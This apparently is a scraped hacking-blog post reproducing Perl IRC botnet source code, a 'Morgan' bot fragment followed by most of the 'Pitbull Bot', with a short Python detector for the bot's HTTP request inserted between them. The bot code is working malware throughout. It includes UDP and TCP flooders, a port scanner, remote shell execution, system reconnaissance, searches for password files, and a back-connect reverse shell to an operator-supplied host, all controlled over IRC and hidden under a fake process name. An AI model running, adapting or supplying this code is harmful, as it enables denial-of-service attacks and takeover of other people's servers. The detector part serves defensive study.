 my ($cur_time);
 my ($ia,$pa,$proto,$j,$l,$t);
 $ia=inet_aton($_[0]);
 $pa=sockaddr_in($_[1],$ia);
 $ftime=$_[2];
 $proto=getprotobyname('tcp');
 $j=0;$l=0;
 $cur_time = time - $itime;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  socket($t,PF_INET,SOCK_STREAM,$proto);
  connect($t,$pa)||$j--;
  $j++;$l++;
 }
 $l=0;
 while ($l<1000){
  $cur_time = time - $itime;
  last if $cur_time >= $ftime;
  $t="SOCK$l";
  shutdown($t,2);
  $l++;
 }
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com
sub udpflooder {
  my $iaddr = inet_aton($_[0]);
  my $msg = 'A' x $_[1];
  my $ftime = $_[2];
  my $cp = 0;
  my (%pacotes);
  $pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;

  socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;

  socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
  socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
  socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
  return(undef) if $cp == 4;
  my $itime = time;
  my ($cur_time);
  while ( 1 ) {
     for (my $porta = 1; $porta <= 65000; $porta++) {
       $cur_time = time - $itime;
       last if $cur_time >= $ftime;
       send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
       send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
       send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
       send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;

       for (my $pc = 3; $pc <= 255;$pc++) {
         next if $pc == 6;
         $cur_time = time - $itime;
         last if $cur_time >= $ftime;
         socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
         send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;
       }
 }
     last if $cur_time >= $ftime;
  }
  return($cur_time, %pacotes);
}

sub ctcp {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :\001$_[1]\001");
}
sub msg {
   return unless $#_ == 1;
   sendraw("PRIVMSG $_[0] :$_[1]");
}
sub notice {
   return unless $#_ == 1;
   sendraw("NOTICE $_[0] :$_[1]");
}
sub op {
   return unless $#_ == 1;
   sendraw("MODE $_[0] +o $_[1]");
}
sub deop {
   return unless $#_ == 1;
   sendraw("MODE $_[0] -o $_[1]");
}
sub j { &join(@_); }
sub join {
   return unless $#_ == 0;
   sendraw("JOIN $_[0]");
}
sub p { part(@_); }
sub part {
  sendraw("PART $_[0]");
}
sub nick {
  return unless $#_ == 0;
  sendraw("NICK $_[0]");
}
sub quit {
  sendraw("QUIT :$_[0]");
}

# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com

sub fetch(){
    my $rnd=(int(rand(9999)));
    my $n= 80;
    if ($rnd<5000) { $n<<=1;}
    my $s= (int(rand(10)) * $n);
{
my @dominios = ("removed-them-all");
my @str;

foreach $dom  (@dominios)
{
    push (@str,"@gstring");
}

    my $query="www.google.com.ar/custom?q=";
    $query.=$str[(rand(scalar(@str)))];
    $query.="&num=$n&start=$s";
    my @lst=();
#sendraw("privmsg #Morgan :DEBUG only test googling: ".$query."");
    my $page = http_query($query);
    while ($page =~  m/<a class=l href=\"?http:\/\/([^>\"]+)\"?>/g){
if ($1 !~ m/google|cache|translate/){
    push (@lst,$1);
}
    }
    return (@lst);
}

sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;
    my $page="";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~s/$host//;
    if ($query eq "") {$query="/";};
    eval {
local $SIG{ALRM} = sub { die "1";};
alarm 10;
my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
print $sock "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
my @r = <$sock>;
$page="@r";
alarm 0;
close($sock);
    };

   return $page;
}
}
# MORGAN OWNED YOUR BOX
# www.morganxpl.com
# morgan.rx@gmail.com

# NOTE: DONT REMOVE COPYRIGHTS
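
The request that http_query() above writes to the socket has a fixed shape: HTTP/1.0, exactly three headers in a fixed order, and a bare "Mozilla/5.0" User-Agent, so it can be matched in proxy logs or packet captures. The Python check below is an added example, not part of the bot source or the original post; the verdict labels, function names and sample requests are constructed for illustration.

```python
"""Flag HTTP requests that match the fixed request written by http_query().

Added example, not part of the bot source. Verdict labels, function names
and the sample requests are constructed for illustration.
"""

# Values taken from the print statement in http_query():
#   "GET $query HTTP/1.0\r\nHost: $host\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"
BOT_VERSION = "HTTP/1.0"
BOT_HEADER_ORDER = ["host", "accept", "user-agent"]
BOT_ACCEPT = "*/*"
BOT_USER_AGENT = "Mozilla/5.0"


def parse_request(raw: bytes):
    """Split a raw request head into (method, target, version, headers).

    headers is a list of (lowercased name, value) pairs in wire order,
    because header order is part of the fingerprint.
    Returns None when the bytes are not a parsable HTTP request head.
    """
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3:
        return None
    method, target, version = parts
    headers = []
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if not sep or not name.strip():
            return None
        headers.append((name.strip().lower(), value.strip()))
    return method, target, version, headers


def classify(raw: bytes) -> str:
    """Return 'match', 'suspicious', 'clean' or 'malformed' for one request.

    'match'      : every element of the http_query() request is present.
    'suspicious' : only the bare User-Agent matches. Real browsers always
                   append platform tokens after "Mozilla/5.0", so the bare
                   value alone is worth a look even if the rest differs.
    """
    parsed = parse_request(raw)
    if parsed is None:
        return "malformed"
    method, _target, version, headers = parsed
    names = [name for name, _ in headers]
    values = dict(headers)
    bare_ua = values.get("user-agent") == BOT_USER_AGENT
    exact = (
        method == "GET"
        and version == BOT_VERSION
        and names == BOT_HEADER_ORDER
        and values.get("accept") == BOT_ACCEPT
        and bare_ua
    )
    if exact:
        return "match"
    if bare_ua:
        return "suspicious"
    return "clean"


# Constructed sample requests (hosts and paths are placeholders).
SAMPLES = {
    "bot": b"GET /custom?q=test&num=80&start=160 HTTP/1.0\r\n"
           b"Host: search.example\r\nAccept: */*\r\n"
           b"User-Agent: Mozilla/5.0\r\n\r\n",
    "browser": b"GET /index.html HTTP/1.1\r\nHost: www.example\r\n"
               b"User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) "
               b"Gecko/20100101 Firefox/115.0\r\nAccept: text/html\r\n\r\n",
    "bare_ua_http11": b"GET / HTTP/1.1\r\nHost: www.example\r\n"
                      b"User-Agent: Mozilla/5.0\r\nAccept: */*\r\n"
                      b"Connection: close\r\n\r\n",
    "curl": b"GET / HTTP/1.1\r\nHost: www.example\r\n"
            b"User-Agent: curl/8.0.1\r\nAccept: */*\r\n\r\n",
    "not_http": b"\x16\x03\x01\x02\x00",
}


def scan(samples):
    """Classify every sample and return {name: verdict}."""
    return {name: classify(raw) for name, raw in samples.items()}


if __name__ == "__main__":
    for name, verdict in scan(SAMPLES).items():
        print(f"{name:16s} {verdict}")
```
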

Posted by applicationlayer

Pitbull Bot

webhxxx/RFI bot 2010. 4. 18. 14:28
#!/usr/bin/perl
# Pitbull Bot
#
# Coded by : The_PitBull
#
# Thanks to :
# Ex0d3us for the Scanner
# r0x00k  for testing and helping
#
# Greets to :
# ASC @ irc.ascnet.biz
#
# Fuck you to :
# W8ting4u
# Morgan
#
#You can use the following commands :
#!bot @portscan <ip>
#!bot @back <ip><port>   
#!bot @udpflood <ip> <packet size> <time>
#!bot @tcpflood <ip> <port> <packet size> <time>
#!bot @httpflood <site> <time>
#!bot @linuxhelp
#!bot @multiscan <vuln> <dork>
#!bot @googlescan <vuln> <dork>
#!bot @system
#!bot @milw0rm
#!bot @join <#channel>   
#!bot @part <#channel>
#!bot @help
#!bot cd tmp for example
#
#
########################################################################################################################
# ______   __              ___    _   __    ___          __   __                                                       #
#/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
# / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
#/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
#                                                                                                                      #
########################################################################################################################

######################
use HTTP::Request;
use LWP::UserAgent;
######################
my $processo = '[httpds]';
######################


######################
#   Configuration    #
#                    #
############################################
my $linas_max='8';
#                                          #
# Maximum Lines for Anti Flood             #
############################################
my $sleep='5';
#                                          #                                     
#Sleep Time                                #
############################################
my @cmdstring='http://www.fuzi.by.ru/list.txt';
#                                          #
#CMD String                                #
############################################
my @adms=("FuZi^vL");
#                                          #
#Admins of the Bot set your nickname here  #
############################################
my @canais=("#fuzi");
#                                          #
#Put your channel here                     #
############################################
my @nickname = ("Priv8Scan");
my $nick = $nickname[rand scalar @nickname];
#                                          #
#Nickname of bot                           #
############################################
my $ircname ='YOurScan';
chop (my $realname = 'YourScan');
#                                          #
#IRC name and Realname                     #
############################################
$servidor='irc.fuzi.biz' unless $servidor;
my $porta='6667';
#                                          #
#IRCServer and port                        #
############################################
my $VERSAO = '11,1 Scan =] ';
#Dont Change                               #
############################################
#End of Configuration#
#                    #
######################
$SIG{'INT'} = 'IGNORE';
######################
$SIG{'HUP'} = 'IGNORE';
######################
$SIG{'TERM'} = 'IGNORE';
######################
$SIG{'CHLD'} = 'IGNORE';
######################
$SIG{'PS'} = 'IGNORE';
######################
use IO::Socket;
######################
use Socket;
######################
use IO::Select;
######################
chdir("/");
######################
########################################################################################################################
# ______   __              ___    _   __    ___          __   __                                                       #
#/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
# / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
#/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
#                                                                                                                      #
########################################################################################################################

#Connect
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Masalah fork: $!" unless defined($pid);

our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
  if ($#_ == '1') {
    my $socket = $_[0];
    print $socket "$_[1]\n";
    } else {
    print $IRC_cur_socket "$_[0]\n";
  }
}

sub conectar {
  my $meunick = $_[0];
  my $servidor_con = $_[1];
  my $porta_con = $_[2];
  my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con",
  PeerPort=>$porta_con) or return(1);
  if (defined($IRC_socket)) {
    $IRC_cur_socket = $IRC_socket;
    $IRC_socket->autoflush(1);
    $sel_cliente->add($IRC_socket);
    $irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
    $irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
    $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
    $irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
    nick("$meunick");
    sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
    sleep 1;
  }
}

my $line_temp;
while( 1 ) {
  while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
  delete($irc_servers{''}) if (defined($irc_servers{''}));
  my @ready = $sel_cliente->can_read(0);
  next unless(@ready);
  foreach $fh (@ready) {
    $IRC_cur_socket = $fh;
    $meunick = $irc_servers{$IRC_cur_socket}{'nick'};
    $nread = sysread($fh, $msg, 4096);
    if ($nread == 0) {
      $sel_cliente->remove($fh);
      $fh->close;
      delete($irc_servers{$fh});
    }
    @lines = split (/\n/, $msg);
    for(my $c=0; $c<= $#lines; $c++) {

      $line = $lines[$c];
      $line=$line_temp.$line if ($line_temp);
      $line_temp='';
      $line =~ s/\r$//;
      unless ($c == $#lines) {
        parse("$line");
        } else {
        if ($#lines == 0) {
          parse("$line");
          } elsif ($lines[$c] =~ /\r$/) {
          parse("$line");
          } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
          parse("$line");
                 } else {
                             $line_temp = $line;
        }
      }
    }
  }
}

sub parse {
  my $servarg = shift;
  if ($servarg =~ /^PING \:(.*)/) {
    sendraw("PONG :$1");
    } elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
    my $pn=$1; my $hostmask= $3; my $onde = $4; my $args = $5;
    if ($args =~ /^\001VERSION\001$/) {
           notice("$pn", "\001VERSION mIRC v6.17 PitBull\001");
    }
    if (grep {$_ =~ /^\Q$pn\E$/i } @adms ) {
    if ($onde eq "$meunick"){
    shell("$pn", "$args");
  }

  #End of Connect

  ########################################################################################################################
  # ______   __              ___    _   __    ___          __   __                                                       #
  #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
  # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
  #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
  #                                                                                                                      #
  ########################################################################################################################

  ######################
  #      PREFIX        #
  #                    #
  ######################
  # You can change the prefix if you want but the commands will be different
  # The standard prefix is !bot if you change it into !bitch for example
  # every command will be like !bitch @udpflood, !bitch @googlescan.
  # So its recommended not to change this ;)
  ######################

  if ($args =~ /^(\Q$meunick\E|\!bot)\s+(.*)/ ) {
    my $natrix = $1;
    my $arg = $2;
    if ($arg =~ /^\!(.*)/) {
      ircase("$pn","$onde","$1") unless ($natrix eq "!bot" and $arg =~ /^\!nick/);
      } elsif ($arg =~ /^\@(.*)/) {
      $ondep = $onde;
      $ondep = $pn if $onde eq $meunick;
      bfunc("$ondep","$1");
      } else {
      shell("$onde", "$arg");
    }
  }
}
}
######################
#   End of PREFIX    #
#                    #
######################

elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
if (lc($1) eq lc($meunick)) {
  $meunick=$4;
  $irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
}
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
nick("$meunick|".int rand(999999));
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
$meunick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
foreach my $canal (@canais) {
  sendraw("JOIN $canal ddosit");
}
}
}

sub bfunc {
my $printl = $_[0];
my $funcarg = $_[1];
if (my $pid = fork) {
waitpid($pid, 0);
} else {
if (fork) {
  exit;
} else {

######################
#       Help         #
#                    #
######################

if ($funcarg =~ /^help/) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 11,1 PitBull BOT Help");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 Select the function you want help for");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@ddos");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@rfiscan");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@backconnect");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@shell");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@portscanner");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 Or if you want too know all the commands type:");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@commands");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 11,1 System Scan Help");

}

if ($funcarg =~ /^ddos/) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 There are 3 DDossers in this bot");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 UDPFlood, HTTPFlood and TCPFlood");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@udpflood <ip> <packet size> <time>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@tcpflood <ip> <port> <packet size> <time>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@httpflood <site> <time>");

}

if ($funcarg =~ /^rfiscan/) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 This bot also contains a RFI Scanner.");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You have multiengine scan that contains :12G4o8o12g9l4e4,2Altavista4,7All7The7Web4,14A4S14K4 and 7AOL  ");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 Or you can just scan with google ");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 Commands :");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@multiscan <vuln> <dork>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@googlescan <vuln> <dork>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You can find strings here : http://www.xshqiptaretx.org/strings.txt ");

}

if ($funcarg =~ /^backconnect/) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You use backconnect like this :");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@back <ip><port>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 11,1 System Scan ");
}

if ($funcarg =~ /^shell/) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 This bot has a integrated shell");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You can use it in private but also public in the channel");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 In public channel just use : 7!bot cd tmp12 for example");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 For help with the linux commands type :!bot 7@linuxhelp");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 11,1 System Scan ");

}

if ($funcarg =~ /^portscanner/) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 The portscanner is very easy to use just type the following :");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@portscan <ip>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 11,1 System Scan ");
}

if ($funcarg =~ /^commands/) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 You can use the following commands :");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@portscan <ip>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@back <ip><port>");   
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot cd tmp 12 for example");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@udpflood <ip> <packet size> <time>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@tcpflood <ip> <port> <packet size> <time>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@httpflood <site> <time>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@linuxhelp");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@multiscan <vuln> <dork>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@googlescan <vuln> <dork>");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@system");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@milw0rm");   
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@join #channel");   
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 !bot 7@part #channel");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Help12:.4| 12 11,1 System Scan ");
}

if ($funcarg =~ /^linuxhelp/) {
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Dir where you are : pwd");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Start a Perl file : perl file.pl");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Go back from dir : cd ..");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Force to Remove a file/dir : rm -rf file/dir;ls -la");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Show all files/dir with permissions : ls -lia");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Find config.inc.php files : find / -type f -name config.inc.php");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Find all writable folders and files : find / -perm -2 -ls");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Find all .htpasswd files : find / -type f -name .htpasswd");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4LiNuX12:.4| - 12 Find all service.pwd files : find / -type f -name service.pwd");
}

######################
#   End of  Help     #
#                    #
######################

######################
#     Commands       #
#                    #
######################

if ($funcarg =~ /^system/) {
  $uname=`uname -a`;$uptime=`uptime`;$ownd=`pwd`;$distro=`cat /etc/issue`;$id=`id`;$un=`uname -sro`;
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Info BOT : 7 Servidor :Hiden : 6667");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Uname -a     : 7 $uname");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Uptime       : 7 $uptime");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Own Prosses  : 7 $processo");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12ID           : 7 $id");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Own Dir      : 7 $ownd");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12OS           : 7 $distro");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Owner        : 7 The_PitBull");
      sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4System Info12:.4| 12Channel      : 7 #pitbull");
}

if ($funcarg =~ /^milw0rm/) {
      my @ltt=();
      my @bug=();
      my $x;
      my $page="";
      my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return;
      print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n";
      my @r = <$socke>;
      $page="@r";
      close($socke);
      while ($page =~  m/<title>(.*)</g){
      $x = $1;
      if ($x =~ /\&lt\;/) {
        $x =~ s/\&lt\;/</g;
        }
        if ($x !~ /milw0rm/) {
          push (@bug,$x);
          }}
          while ($page =~  m/<link.*expl.*([0-9]...)</g) {
            if ($1 !~ m/milw0rm.com|exploits|en/){
            push (@ltt,"http://www.milw0rm.com/exploits/$1 ");
            }}
                sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:9milw0rm12:.4|12 Latest exploits :");
            foreach $x (0..(@ltt - 1)) {
                  sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:9milw0rm12:.4|12  $bug[$x] - $ltt[$x]");
              sleep 1;
          }}
          ########################################################################################################################
          # ______   __              ___    _   __    ___          __   __                                                       #
          #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
          # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
          #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
          #                                                                                                                      #
          ########################################################################################################################
          ######################
          #      Portscan      #
          #                    #
          ######################

          if ($funcarg =~ /^portscan (.*)/) {
            my $hostip="$1";
            my
            @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555");
            my (@aberta, %porta_banner);
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Port Scan12:.4|12 Scanning for open ports on 4".$1." 12 started .");
            foreach my $porta (@portas)  {
              my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto =>
              'tcp', Timeout => 4);
              if ($scansock) {
                push (@aberta, $porta);
                $scansock->close;
              }
            }

            if (@aberta) {
              sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Port Scan12:.4|12 Open ports founded: @aberta");
              } else {
              sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4Port Scan12:.4|12 No open ports foundend.");
            }
          }

          ######################
          #  End of  Portscan  #
          #                    #
          ######################
          ########################################################################################################################
          # ______   __              ___    _   __    ___          __   __                                                       #
          #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
          # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
          #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
          #                                                                                                                      #
          ########################################################################################################################
          ######################
          #  Join And Part     #
          #                    #
          ######################
          if ($funcarg =~ /^join (.*)/) {
            sendraw($IRC_cur_socket, "JOIN ".$1);
          }
          if ($funcarg =~ /^part (.*)/) {
            sendraw($IRC_cur_socket, "PART ".$1);
          }
                    
          ######################
          #End of Join And Part#
          #                    #
          ######################
          ########################################################################################################################
          # ______   __              ___    _   __    ___          __   __                                                       #
          #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
          # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
          #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
          #                                                                                                                      #
          ########################################################################################################################
          ######################
          #     TCPFlood       #
          #                    #
          ######################

          if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) {
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4TCP DDos12:.4|12 Attacking 4 ".$1.":".$2." 12for 4 ".$3." 12seconds.");
            my $itime = time;
            my ($cur_time);
            $cur_time = time - $itime;
            while ($3>$cur_time){
            $cur_time = time - $itime;
            &tcpflooder("$1","$2","$3");
          }
          sendraw($IRC_cur_socket,"PRIVMSG $printl :4|12.:4TCP DDos12:.4| 12Attack done 4 ".$1.":".$2.".");
        }
        ######################
        #  End of TCPFlood   #
        #                    #
        ######################
        ########################################################################################################################
        # ______   __              ___    _   __    ___          __   __                                                       #
        #/_  __/  / /  ___        / _ \  (_) / /_  / _ ) __ __  / /  / /                                                       #
        # / /    / _ \/ -_)      / ___/ / / / __/ / _  |/ // / / /  / /                                                        #
        #/_/    /_//_/\__/      /_/    /_/  \__/ /____/ \_,_/ /_/  /_/                                                         #
        #                                                                                                                      #
        ########################################################################################################################
        ######################
        #   Back Connect     #
        #                    #
        ######################
        if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) {
          my $host = "$1";
          my $porta = "$2";
          my $proto = getprotobyname('tcp');
          my $iaddr = inet_aton($host);
          my $paddr = sockaddr_in($porta, $iaddr);
          my $shell = "/bin/sh -i";
          if ($^O eq "MSWin32") {
            $shell = "cmd.exe";
          }
          socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
          connect(SOCKET, $paddr) or die "connect: $!";
          open(STDIN, ">&SOCKET");
          open(STDOUT, ">&SOCKET");
          open(STDERR, ">&SOCKET");
          system("$shell");
          close(STDIN);
          close(STDOUT);
          close(STDERR);
          if ($estatisticas)
          {
            sendraw($IRC_cur_socket, "PRIVMSG $printl :4|12.:4BackConnect12:.4|12 Connecting to 4 $host:$porta");
          }
        }
        ######################
        #End of  Back Connect#
        #                    #
        ######################
        ########################################################################################################################
